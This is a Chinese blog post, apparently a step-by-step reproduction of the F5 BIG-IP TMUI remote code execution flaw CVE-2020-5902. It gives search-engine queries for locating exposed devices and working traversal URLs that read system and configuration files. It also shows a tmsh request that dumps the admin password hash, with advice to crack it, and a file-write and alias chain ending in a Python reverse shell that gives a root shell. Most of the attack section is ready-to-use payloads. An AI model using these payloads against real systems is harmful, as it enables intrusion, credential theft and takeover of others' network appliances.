(CVE-2020-5902)漏洞复现|我们能从F5 BIG-IP 远程代码执行漏洞学到什么?

最新推荐文章于 2023-02-03 18:13:53 发布
最新推荐文章于 2023-02-03 18:13:53 发布
阅读量773 收藏
点赞数
分类专栏: 漏洞复现 文章标签: 渗透 渗透测试 入侵教材 网络安全 web入侵
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/siaowei44/article/details/107250455
版权

(一)漏洞简介

上周爆出一个严重的漏洞,漏洞编号为CVE-2020-5902。这个漏洞存在于F5公司的Big-IP设备。

BIG-IP 广泛应用于大型企业,数据中心、云计算平台中,可以实现应用加速、负载均衡、SLL过载、web应用防火墙等功能。

简而言之,通过在Big-IP的TMUI(用户管理页面)发送特定的请求包,就可以在管理员权限下读取文件、写入文件并执行bash命令。

经过了解,该产品应用广泛,然而该漏洞复现简单,可以说影响颇大,建议存在该漏洞的Big-IP版本尽快修复。

(二)影响版本

  • BIG-IP 15.x: 15.1.0/15.0.0
  • BIG-IP 14.x: 14.1.0 ~ 14.1.2
  • BIG-IP 13.x: 13.1.0 ~ 13.1.3
  • BIG-IP 12.x: 12.1.0 ~ 12.1.5
  • BIG-IP 11.x: 11.6.1 ~ 11.6.5

(三)漏洞验证

1.从各大规则检索平台进行漏洞版本检索

钟馗之眼 :app:"BIG-IP"&&tumi

fofa:app="BIG-IP"&&tumi

不过,大佬已经写了脚本开始寻找漏洞版本了,效率更高,总之,按自己的方法找到存在漏洞的ip

2.访问到ip

会来到BIG-IP的用户管理页面

3.直接在url执行

这里有一个文件读取漏洞

https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

返回的内容如果是/etc/passwd文件的内容,说明存在文件读取漏洞

这里是文件目录穿越,然后执行fileRead.jsp脚本,可以任意读取文件(非root权限)fileName=后面跟文件路径

其他的文件读取POC

https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts

https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license

https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf

4.命令执行POC

https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin

调用tmshCmd.jsp脚本进行文件执行,command=跟要执行的命令

这里涉及到一个验证漏洞点的问题,主要观察“output”字段,如果该字段可以返回admin的密钥的密文或者报错,说明该指令执行了,如果返回为空,说明后台限制了命令执行,这个网站就很难被渗透了。

这里的list 这些命令是防火墙自己定义的Tmsh命令。想了解请点击这个地址https://clouddocs.f5.com/api/tmsh/Other.html

其中list 代表bash 命令,auth大概是用户认证命令,该命令会返回user后跟的用户字段的密文

$6$意思是用SHA512加密的128位密文,可以尝试找爆破工具解密一下该字段。如果密文中有" \/ "符号,则“ \ ”是转义字符,解密时将其删除。

(四)漏洞利用(获取shell)

漏洞利用成功后相当于拿到root权限,可以读取任意文件,执行任意命令。

在url中https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/后执行exp即可,

tmshCmd.jsp?command=create+cli+alias+private+list+command+bash    //创建一个tmsh命令,将list别名为bash
fileSave.jsp?fileName=/tmp/cmd&content=id    //执行文件写入脚本,保存在/tmp/cmd,内容在content=后面
tmshCmd.jsp?command=list+/tmp/cmd    //文件执行,执行上一步写入的内容
tmshCmd.jsp?command=delete+cli+alias+private+list    //清除tmsh命令

执行到第三步,如果返回了id执行后的内容,即当前用户即权限,说明存在执行漏洞,

如果存在漏洞,将id字段替换为反弹shell脚本,攻击端开启监听,就能拿到shell(root权限)

id字段替换的反弹shell脚本如下

python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('<YOUR IP>',<YOUR PORT>));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

监听结果: 成功的监听到了设备反弹的shell。

 

参考链接:https://mp.weixin.qq.com/s/I2RkG4Co63IhBqnbpchqWQ

                  https://msd.misuland.com/pd/4425384115382000044

siaowei08
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
F5 BIG-IP 存在远程命令执行漏洞(CVE-2022-1388)
nnn2188185的博客
05-06 572
F5 BIG-IP 是美国 F5 公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。 F5 BIG-IP 存在访问控制错误漏洞,攻击者可以通过未公开的请求利用该漏洞绕过 BIG-IP 中的 iControl REST 身份验证来控制受影响的系统。 可造成远程命令执行漏洞
F5 BIG-IP远程代码执行漏洞(CVE-2020-5902)复现
m0_48520508的博客
11-18 1245
0x00简介 F5 BIG-IP 是美国``F5公司一款集成流量管理、DNS、出入站规则、web应用防火墙、web网关、负载均衡等功能的应用交付平台。 在F5 BIG-IP产品的流量管理用户页面 (TMUI)/配置程序的特定页面中存在一处远程代码执行漏洞,导致可以未授权访问TMUI模块所有功能(包括未公开功能),漏洞影响范围包括执行任意系统命令、任意文件读取、任意文件写入、开启/禁用服务等。 0x02漏洞概述 攻击者可利用该漏洞执行任意系统命令、创建或删除文件、禁用服务、执行任意的Java代码,可获取sh
F5 BIG-IP CVE-2020-5902 漏洞利用
weixin_46137328的博客
07-07 455
0x00 漏洞概述7月1日,F5发布公告,其流量管理用户接口(Traffic Management User Interface ,简称TMUI),也称为配置实用程序(Configura...
F5 BIG-IP 高危漏洞可导致拒绝服务和代码执行
smellycat000的专栏
02-03 1454
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士F5 提醒称,BIG-IP 中存在一个高危格式化字符串漏洞 (CVE-2023-22374),可导致认证攻击者触发拒绝服务条件并可能执行任意代码。该漏洞影响一个公开的API即 iControl SOAP,该API用于赋能系统间的通信。SOAP接口可通过BIG-IP管理端口和/或自己的IP地址从网络访问,且仅限于管理员账户。发现该漏洞的Rapid ...
F5公司BIG-IP代码执行漏洞 CVE-2020-5902
huanxiaoji1726的博客
07-06 3358
CVE-2020-5902 漏洞 漏洞描述 F5 BIG-IP 是美国F5公司一款集成流量管理、DNS、出入站规则、web应用防火墙、web网关、负载均衡等功能的应用交付平台。在 F5 BIG-IP 产品的流量管理用户页面 (TMUI)/配置实用程序的特定页面中存在一处远程代码执行漏洞。未授权的远程攻击者通过向该页面发送特制的请求包,可以造成任意Java 代码执行。进而控制 F5 BIG-IP 的全部功能,包括但不限于: 执行任意系统命令、开启/禁用服务、创建/删除服务器端文件等。 代码执行: curl -
CVE-2020-5902 F5 BIG-IP TMUI 远程代码执行漏洞.md
04-23
CVE-2020-5902 F5 BIG-IP TMUI 远程代码执行漏洞
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
CVE-2021-22986 F5 BIG-IP-IQ 远程代码执行.md
04-23
CVE-2021-22986 F5 BIG-IP-IQ 远程代码执行
[应用漏洞]F5 BIG-IP远程代码执行漏洞CVE-2020-5902
不忘初心,护天下安全!
07-09 1290
一、漏洞介绍 F5 BIG-IP 是美国 F5 公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。PositiveTechnologies的研究人员Mikhail Klyuchnikov 发现其配置工具Traffic Management User Interface(TMUI)中存在远程代码执行漏洞CVE编号为CVE-2020-5902。该漏洞CVSSv3评分为10分,攻击者可利用该漏洞创建或删除文件,关闭服务、执行任意的系统命令,最终获得服务器的完全控制权。 二、涉及.
[旧文系列] CVE-2020-5902: F5 BIG-IP RCE 漏洞复现与分析
mole_exp的博客
01-05 3734
文章目录关于<旧文迁移>1、前言2、搭建漏洞环境3、漏洞复现3.1 任意文件读取3.2 列出目录项3.3 RCE4、搭建漏洞调试环境5、漏洞分析5.1 坑5.2 漏洞原理Apache与Tomcat对分号 ; 的解析差异5.3 小结参考 关于<旧文迁移> <旧文迁移>系列是笔者将以前发到其他地方的技术文章,挑选其中一些值得保留的,迁移到当前博客来。 文章首发地址:hxxps://medium.com/@m01e/cve-2020-5902-f5-big-ip-rce-漏洞
F5 BIG-IP 远程代码执行漏洞 CVE-2021-22986
sun_k的博客
03-25 846
免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负! 转载声明:著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。 一:漏洞描述 F5 BIG-IP 是美国 F5 公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台,,F5安全公告更新了BIG-IPBIG-IQ中的多个严重漏洞。 二: 漏洞影响 F5 BIG-IP 16.x: 16.1.0.3 F5 BIG-IP 15.x: 15.1.0.4 F5 BIG-IP 14.x:
CVE-2022-1388 F5 BIG-IP权限绕过命令执行漏洞复现
热爱学习,喜欢折腾!
09-02 2071
F5Networks(纳斯达克: FFIV),全球领先的应用交付网络(ADN)领域的厂商,创建于1996年,总部位于美国西雅图市,F5为全球大型企业、运营商、政府与消费品牌提供更加快速、安全以及智能的应用,通过交付云与安全解决方案,F5帮助企业在不损失速度与管理性的同时享有它们所需的应用架构。F5官网发布安全公告,披露F5 BIG-IP存在一处远程代码执行漏洞CVE-2022-1388)。
(有下载链接)F5 BIG-IP 远程代码执行漏洞复现CVE-2020-5902
whojoe的博客
07-06 5810
F5 BIG-IP 远程代码执行漏洞复现CVE-2020-5902)前言漏洞详情影响版本修复建议环境搭建漏洞复现参考文章 前言 漏洞详情 F5 BIG-IP 是美国F5公司一款集成流量管理、DNS、出入站规则、web应用防火墙、web网关、负载均衡等功能的应用交付平台。 在 F5 BIG-IP 产品的流量管理用户页面 (TMUI)/配置实用程序的特定页面中存在一处远程代码执行漏洞。 未授权的远程攻击者通过向该页面发送特制的请求包,可以造成任意Java 代码执行。进而控制 F5 BIG-IP 的全部功能,包
F5 最新CVE漏洞说明:BIG-IPBIG-IQ 的新漏洞和更新
f5networks的博客
11-04 1298
作为安全漏洞持续管理的一部分,F5 在8月24日发布了 BIG-IPBIG-IQ 的新漏洞和更新。对漏洞及时披露和有效补救是我们安全实践的核心诉求,这反映了我们保持警惕并专注于不断改进的不懈努力。
CVE-2020-5902: F5 BIG-IP 远程代码执行漏洞分析
爱国小白帽
07-15 1289
360-CERT [三六零CERT](javascript:void(0)???? 昨天 0x00 漏洞简述 2020年07月08日, 360CERT监测发现 F5 官方更新了 F5 BIG-IP 远程代码执行 的风险通告,该漏洞编号为 CVE-2020-5902漏洞等级:严重。 未授权的远程攻击者通过向漏洞页面发送特制的请求包,可以造成任意 Java 代码执行。进而控制 F5 BIG-IP 的全部功能,包括但不限于: 执行任意系统命令、开启/禁用服务、创建/删除服务器端文件等,使用官方的httpd配置
【更新】【补丁绕过】CVE-2020-5902: F5 BIG-IP 远程代码执行漏洞通告更新
爱国小白帽
07-08 1045
【更新】【补丁绕过】CVE-2020-5902: F5 BIG-IP 远程代码执行漏洞通告更新 360-CERT [三六零CERT](javascript:void(0)???? 今天 0x00 漏洞简述 2020年07月08日, 360CERT监测发现 F5 官方更新了 F5 BIG-IP 远程代码执行 的风险通告,该漏洞编号为 CVE-2020-5902漏洞等级:严重。 未授权的远程攻击者通过向漏洞页面发送特制的请求包,可以造成任意 Java 代码执行。进而控制 F5 BIG-IP 的全部功能,包括
F5 BIG-IP hsqldb(CVE-2020-5902)漏洞踩坑分析
晓得哥的博客
07-16 625
作者:Longofo@知道创宇404实验室时间:2020年7月10日English Version:https://paper.seebug.org/1272/ 原文链接:https://paper.seebug.org/1271/ F5 BIG-IP最近发生了一次比较严重的RCE漏洞,其中主要公开出来的入口就是tmsh与hsqldb方式,tmsh的利用与分析分析比较多了,如果复现过tmsh的利用,就应该知道这个地方利用有些鸡肋,后面不对tmsh进行分析,主要看下hsqldb的利用。hsqldb的利用.
cve-2022-30190 msdt远程代码执行漏洞复现
最新发布
09-10
CVE-2022-30190是一个针对Microsoft的漏洞,被称为msdt远程代码执行漏洞。该漏洞允许攻击者通过利用命令行工具"msdt.exe"的特定参数进行远程代码执行。以下是关于该漏洞复现过程。 首先,我们需要使用攻击者控制...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值